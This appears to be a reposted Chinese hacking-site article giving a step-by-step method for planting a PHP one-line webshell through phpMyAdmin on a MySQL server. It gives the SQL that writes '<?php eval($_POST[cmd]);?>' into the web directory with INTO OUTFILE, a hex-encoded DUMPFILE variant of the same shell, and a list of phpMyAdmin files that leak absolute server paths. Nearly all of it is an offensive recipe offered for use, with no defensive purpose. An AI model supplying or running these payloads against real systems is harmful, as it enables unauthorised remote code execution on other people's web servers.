mysql数据库中插入一句话

来源:互联网 发布:阿里云校园优惠 编辑:程序博客网 时间:2024/05/17 04:44
1.如何拿到登陆密码. 自己想办法 
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';Drop TABLE IF EXISTS a;----end code---

4.如果没什么意外.对应网站得到webshell
思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
补充:还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';

加密部分为 lanker 一句话 密码为 cmd
--------------------------------------------------------------------------------------------------------
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -                                       
   
        http://target/phpmyadmin/libraries/string.lib.php
        http://target/phpmyadmin/libraries/string.lib.php
        http://target/phpmyadmin/libraries/database_interface.lib.php
        http://target/phpmyadmin/libraries/db_table_exists.lib.php
        http://target/phpmyadmin/libraries/display_export.lib.php
        http://target/phpmyadmin/libraries/header_meta_style.inc.php
        http://target/phpmyadmin/libraries/mcrypt.lib.php


转自:http://www.myhack58.com/Article/html/3/7/2011/30488.htm
0 0
原创粉丝点击